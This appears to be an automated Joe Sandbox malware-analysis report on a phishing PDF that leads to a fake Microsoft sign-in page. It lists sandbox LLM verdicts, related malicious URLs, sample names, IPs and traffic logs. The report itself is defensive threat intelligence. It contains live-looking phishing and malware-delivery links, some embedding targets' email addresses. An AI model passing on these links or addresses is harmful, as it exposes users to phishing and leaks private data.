Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, slscr.update.microsoft.com, clientservices.googleapis.com, acroipm2.adobe.com, wu.azureedge.net, g-msn-com-nsatc.trafficmanager.net, a1952.dscq.akamai.net, r.g.bing.com, clients2.google.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, apps.identrust.com, wu-b-net.trafficmanager.net, optimizationguide-pa.googleapis.com, clients1.google.com, fs.microsoft.com, identrust.edgesuite.net, accounts.google.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com, geo2.adobe.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: xJwSq336bs.pdf

Simulations

Behavior and APIs

Time	Type	Description
15:05:44	API Interceptor	3x Sleep call for process: AcroCEF.exe modified

LLM Input / Output

Input	Output
URL: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html#?bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E= Model: Perplexity: mixtral-8x7b-instruct	{"loginform": false,"urgency": false,"captcha": false,"reasons": ["The webpage does not contain a login form, as there is no explicit request for sensitive information such as passwords, email addresses, usernames, phone numbers, or credit card numbers.","The text does not create a sense of urgency or interest, as there are no phrases that encourage immediate action such as 'Click here to view document' or 'Open the link to see your invoice.'","The webpage does not contain a CAPTCHA or any other anti-robot detection mechanism."]}
Title: boldness OCR: Microsoft Sign in No account? Create one! Can't access pur account? Next Sign-in options Terms of use Privacy & ckies
URL: PDF Model: gpt-4o	```json{ "riskscore": 8, "reasons": "The screenshot contains a visually prominent 'View Documents' button which is likely to attract user clicks. The text 'Please review and sign your document' creates a sense of urgency. The email appears to impersonate DocuSign, a well-known brand, which adds credibility to the phishing attempt. The combination of urgency and a prominent call-to-action button significantly increases the risk of phishing."}

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.47.168.24	Invoice - 13604562148823146027218688082530555300774892366170 - Pilatus-aircraft.pdf	Get hash	malicious	HTMLPhisher	Browse
	Encrypted Doc-[Ogi-5917842].pdf	Get hash	malicious	HTMLPhisher	Browse
	Novolog (Pharm-Up 1966) LTD_SKM_C590368369060_417161.pdf	Get hash	malicious	HTMLPhisher	Browse
	Invoice - 21153253589581947197326090404964329500290845699807 - Toyotaconnected.pdf	Get hash	malicious	Unknown	Browse
	Hilcorp-updated agreement.pdf	Get hash	malicious	Unknown	Browse
	Invoice - 07776611412802924323813205194919526056527884439486 - Kforce.pdf	Get hash	malicious	Unknown	Browse
	invoicepast.pdf.lnk.mal.lnk	Get hash	malicious	ScreenConnect Tool	Browse
	PG96120000311.pdf.lnk.mal.lnk	Get hash	malicious	Unknown	Browse
	Absa.pdf	Get hash	malicious	HTMLPhisher	Browse
	Absa.pdf	Get hash	malicious	Unknown	Browse
104.18.2.35	http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl	Get hash	malicious	HTMLPhisher	Browse	pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl
	http://pub-5d5794a1344e4ef09c0d498cb30f8875.r2.dev/index.html	Get hash	malicious	Unknown	Browse	pub-5d5794a1344e4ef09c0d498cb30f8875.r2.dev/index.html
	http://pub-5e86a1f01e5a4476812e4d108add0587.r2.dev/index.html	Get hash	malicious	Unknown	Browse	pub-5e86a1f01e5a4476812e4d108add0587.r2.dev/index.html
	http://pub-49f7bdad3ae7458f8076aa4480203a8b.r2.dev/index.html	Get hash	malicious	Unknown	Browse	pub-49f7bdad3ae7458f8076aa4480203a8b.r2.dev/index.html
	http://pub-ab9522f1c3a9451fb5bf68fa1c6bcfca.r2.dev/index.html	Get hash	malicious	Unknown	Browse	pub-ab9522f1c3a9451fb5bf68fa1c6bcfca.r2.dev/index.html
	http://pub-e23528cbdea642ddb1c88fd0d29e30b5.r2.dev/index.html	Get hash	malicious	Unknown	Browse	pub-e23528cbdea642ddb1c88fd0d29e30b5.r2.dev/index.html
	http://pub-a4db5d6837084a76bc5f6d9216e7e57d.r2.dev/a38.html	Get hash	malicious	Unknown	Browse	pub-a4db5d6837084a76bc5f6d9216e7e57d.r2.dev/a38.html
	http://pub-5d5794a1344e4ef09c0d498cb30f8875.r2.dev/index.html	Get hash	malicious	Unknown	Browse	pub-5d5794a1344e4ef09c0d498cb30f8875.r2.dev/index.html
	http://pub-5e86a1f01e5a4476812e4d108add0587.r2.dev/index.html	Get hash	malicious	Unknown	Browse	pub-5e86a1f01e5a4476812e4d108add0587.r2.dev/index.html
	http://pub-49f7bdad3ae7458f8076aa4480203a8b.r2.dev/index.html	Get hash	malicious	Unknown	Browse	pub-49f7bdad3ae7458f8076aa4480203a8b.r2.dev/index.html
239.255.255.250	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	https://chorbie.com/services/	Get hash	malicious	Unknown	Browse
	http://79.141.36.131	Get hash	malicious	Unknown	Browse
	https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6	Get hash	malicious	HTMLPhisher	Browse
	hANEXOPDF.PDF40 234057.msi	Get hash	malicious	Unknown	Browse
	Invoice - 06736833774062515586349558087774116555577037575401 - Daiichi-sankyo.pdf	Get hash	malicious	HTMLPhisher	Browse
	https://gateway.lighthouse.storage/ipfs/bafkreidrnkion27ep4wvaru45atnhtlbackpdwtf5j73djqjbyjdzvzmdm#mez.jiwaji@nic.bc.ca	Get hash	malicious	Unknown	Browse
	http://nassascha.synology.me/Photo.scr	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
188.114.97.3	ScanPDF_102.exe	Get hash	malicious	FormBook	Browse	www.jjjw.xyz/ypml/
	tYEY1UeurGz0Mjb.exe	Get hash	malicious	FormBook	Browse	www.txglobedev.com/dy13/?IR=HpLmp5lsG/78ww7PQ+32zrfZcWzFIxQC5ZchK1XnBOU/XUWwZI280oPADrvVA1p9LOCI&nL=S4247TXPfxsLR
	new order.exe	Get hash	malicious	FormBook	Browse	www.coinwab.com/efdt/
	http://sp.26skins.com/steamstore/category/action_run_jump/?snr=1_1530_4__12	Get hash	malicious	Unknown	Browse	sp.26skins.com/favicon.ico
	BL Draft.exe	Get hash	malicious	FormBook	Browse	www.gazeta-ufaley.ru/wjr5/
	Your file name without extension goes here.exe	Get hash	malicious	FormBook	Browse	www.pu6wac.buzz/g2ww/
	Purchase Order No.P7696#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/OWlnEE9J/download
	Purchase Order No.P7696#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/OWlnEE9J/download
	MKCC-MEC-RFQ-115-2024.exe	Get hash	malicious	FormBook	Browse	www.checkout4xgrow.shop/ts59/?S0GhCH=DR-Lh8FH5BP&Upql=F3s9qclS9ajlyltz5vx8YuFcODa05tGO2XwI753moUwU8ctXmF/lD/LedP+MQBQFZjkX
	62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	podval.top/LineToPythonJsLowupdateLongpollWindowsFlower.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cdnjs.cloudflare.com	https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://vi-822.pages.dev/robots.txt	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	http://sharepoint-stonecuttercapital.com	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.de	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.de	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://t.apemail.net/c/nqkr6vk3kzmvyhqvdmdrwaabbycqmbacainqogyhdmkxs5qvdmkqcvagayhveflk-nqdbwfkcivnrkgyvpf3bkgygamaa4bqedmcagbahdmdrwbqbaibq4aypdmdrwby3cupvkw2wlfob4fi3a4nvsqs3lmnrkyl6ojqbozlsm54gkyyvdmaacdqfaycaeaq3cvpugq2hiqgrqgc6ljdvwvsfkjjveu2skjmuixszlamviwc2dfkukgcai4nfiwczinjfsqyylnmfqryylzmvguspdfpugws3cunugrkckinqaaqcdmkxs5qvdnmuew23dnmuew23dnmuew23dnmuew23dmkqcvagayhveflk	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://nmg.evlink21.net/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=Y2hyaXMuY291dHVAYWxnb21hLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://GRi-Simulations-Inc-capital-project-proposalonline-secure.yurtdaslarbinicilik.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Academedia_SKM_C590368369060_417161.pdf.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
code.jquery.com	https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	https://vi-822.pages.dev/robots.txt	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	http://sharepoint-stonecuttercapital.com	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.de	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.de	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://t.apemail.net/c/nqkr6vk3kzmvyhqvdmdrwaabbycqmbacainqogyhdmkxs5qvdmkqcvagayhveflk-nqdbwfkcivnrkgyvpf3bkgygamaa4bqedmcagbahdmdrwbqbaibq4aypdmdrwby3cupvkw2wlfob4fi3a4nvsqs3lmnrkyl6ojqbozlsm54gkyyvdmaacdqfaycaeaq3cvpugq2hiqgrqgc6ljdvwvsfkjjveu2skjmuixszlamviwc2dfkukgcai4nfiwczinjfsqyylnmfqryylzmvguspdfpugws3cunugrkckinqaaqcdmkxs5qvdnmuew23dnmuew23dnmuew23dnmuew23dmkqcvagayhveflk	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	http://kuurza.com	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=Y2hyaXMuY291dHVAYWxnb21hLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	http://GRi-Simulations-Inc-capital-project-proposalonline-secure.yurtdaslarbinicilik.com	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	Academedia_SKM_C590368369060_417161.pdf.pdf	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://chorbie.com/services/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	Clipboard Hijacker, PureLog Stealer, RisePro Stealer, zgRAT	Browse	104.17.28.25
	Invoice - 06736833774062515586349558087774116555577037575401 - Daiichi-sankyo.pdf	Get hash	malicious	HTMLPhisher	Browse	104.21.40.60
	0001.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	Leaked.exe	Get hash	malicious	XWorm	Browse	188.114.96.3
	Zz3h8cOX1E.exe	Get hash	malicious	Quasar	Browse	104.26.13.205
	Luciana Alvarez CV.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Acal BFi UK - Products List 020240704.exe	Get hash	malicious	AgentTesla, RedLine, StormKitty, XWorm	Browse	172.67.74.152
	z4XlS0wTQM.exe	Get hash	malicious	Quasar	Browse	104.26.12.205
AKAMAI-ASUS	file.exe	Get hash	malicious	Vidar	Browse	23.192.247.89
	http://sharepoint-stonecuttercapital.com	Get hash	malicious	HTMLPhisher	Browse	23.38.98.114
	https://lantzlagetnet-my.sharepoint.com/:b:/g/personal/christian_lantzlaget_net/EfvDbyrsR1JBhKxhyaS6aX8BVyu8MWIYIqkyeRAJSRL2yA?e=6Phvc1	Get hash	malicious	Unknown	Browse	23.214.40.215
	205.185.124.50-mips-2024-07-03T23_47_54.elf	Get hash	malicious	Mirai, Moobot	Browse	2.17.90.178
	https://wellbeingcaresolutions%5B.%5Dfreshdesk%5B.%5Dcom/support/solutions/articles/201000067168-wellbeing-care-solutions-ltd	Get hash	malicious	HTMLPhisher	Browse	23.212.88.20
	95DVgihS4k.elf	Get hash	malicious	Unknown	Browse	184.26.133.196
	addvXQnjp3.elf	Get hash	malicious	Unknown	Browse	23.64.221.35
	d54Y7Ql8sO.elf	Get hash	malicious	Unknown	Browse	23.67.70.103
	Invoice - 13604562148823146027218688082530555300774892366170 - Pilatus-aircraft.pdf	Get hash	malicious	HTMLPhisher	Browse	23.47.168.24
	https://we.tl/t-dQx6fJKslT	Get hash	malicious	Unknown	Browse	23.211.10.211
CLOUDFLARENETUS	https://chorbie.com/services/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	Clipboard Hijacker, PureLog Stealer, RisePro Stealer, zgRAT	Browse	104.17.28.25
	Invoice - 06736833774062515586349558087774116555577037575401 - Daiichi-sankyo.pdf	Get hash	malicious	HTMLPhisher	Browse	104.21.40.60
	0001.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	Leaked.exe	Get hash	malicious	XWorm	Browse	188.114.96.3
	Zz3h8cOX1E.exe	Get hash	malicious	Quasar	Browse	104.26.13.205
	Luciana Alvarez CV.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Acal BFi UK - Products List 020240704.exe	Get hash	malicious	AgentTesla, RedLine, StormKitty, XWorm	Browse	172.67.74.152
	z4XlS0wTQM.exe	Get hash	malicious	Quasar	Browse	104.26.12.205
FASTLYUS	https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	https://iriss.online/i/ontransfer_pathways/login?p=login	Get hash	malicious	Unknown	Browse	104.244.43.131
	https://vi-822.pages.dev/robots.txt	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	http://sharepoint-stonecuttercapital.com	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.de	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.de	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://t.apemail.net/c/nqkr6vk3kzmvyhqvdmdrwaabbycqmbacainqogyhdmkxs5qvdmkqcvagayhveflk-nqdbwfkcivnrkgyvpf3bkgygamaa4bqedmcagbahdmdrwbqbaibq4aypdmdrwby3cupvkw2wlfob4fi3a4nvsqs3lmnrkyl6ojqbozlsm54gkyyvdmaacdqfaycaeaq3cvpugq2hiqgrqgc6ljdvwvsfkjjveu2skjmuixszlamviwc2dfkukgcai4nfiwczinjfsqyylnmfqryylzmvguspdfpugws3cunugrkckinqaaqcdmkxs5qvdnmuew23dnmuew23dnmuew23dnmuew23dmkqcvagayhveflk	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	http://kuurza.com	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=Y2hyaXMuY291dHVAYWxnb21hLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	185.199.110.133
	http://GRi-Simulations-Inc-capital-project-proposalonline-secure.yurtdaslarbinicilik.com	Get hash	malicious	HTMLPhisher	Browse	185.199.108.133

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	184.28.90.27 40.68.123.157 20.114.59.183
	file.exe	Get hash	malicious	Unknown	Browse	184.28.90.27 40.68.123.157 20.114.59.183
	https://chorbie.com/services/	Get hash	malicious	Unknown	Browse	184.28.90.27 40.68.123.157 20.114.59.183
	http://79.141.36.131	Get hash	malicious	Unknown	Browse	184.28.90.27 40.68.123.157 20.114.59.183
	hANEXOPDF.PDF40 234057.msi	Get hash	malicious	Unknown	Browse	184.28.90.27 40.68.123.157 20.114.59.183
	Invoice - 06736833774062515586349558087774116555577037575401 - Daiichi-sankyo.pdf	Get hash	malicious	HTMLPhisher	Browse	184.28.90.27 40.68.123.157 20.114.59.183
	Zz3h8cOX1E.exe	Get hash	malicious	Quasar	Browse	184.28.90.27 40.68.123.157 20.114.59.183
	Zz3h8cOX1E.exe	Get hash	malicious	Quasar	Browse	184.28.90.27 40.68.123.157 20.114.59.183
	file.exe	Get hash	malicious	Unknown	Browse	184.28.90.27 40.68.123.157 20.114.59.183
	http://circulaires.info	Get hash	malicious	Unknown	Browse	184.28.90.27 40.68.123.157 20.114.59.183

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.224510822903688
Encrypted:	false
SSDEEP:	6:BOEccM+q2Pwkn2nKuAl9OmbnIFUt84OKcJZmw+4OKccMVkwOwkn2nKuAl9OmbjLJ:EERM+vYfHAahFUt811/+1QMV5JfHAaSJ
MD5:	AB1E5996370E1A8E7F1ED82F80118AE2
SHA1:	4EE2D7B21D95F322619AF3AEC69E235897ABFDED
SHA-256:	9CE0C72AE2F760EC6E88515B82B62509A15E9C93E40E43AE160378CB7359F4E9
SHA-512:	4CA7F146AC3F51E9E1BF551290452EBF1591B38EDACC494EB53A938617CDBE39493B4DABCEF64A33B0EDEB0DD4066DDC57D52BC1DA5F5BC3C9C882EDDDD705C5
Malicious:	false
Reputation:	low
Preview:	2024/07/04-15:05:31.197 19fc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/07/04-15:05:31.199 19fc Recovering log #3.2024/07/04-15:05:31.199 19fc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

Source: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html#?bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E=	HTTP Parser: No favicon
Source: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html#?bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E=	HTTP Parser: No favicon

Source: Joe Sandbox View	IP Address: 104.18.2.35 104.18.2.35
Source: Joe Sandbox View	IP Address: 104.18.2.35 104.18.2.35
Source: Joe Sandbox View	IP Address: 23.47.168.24 23.47.168.24
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183

Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Hp9snZF7dKOoUty&MD=YmpwYxfF HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
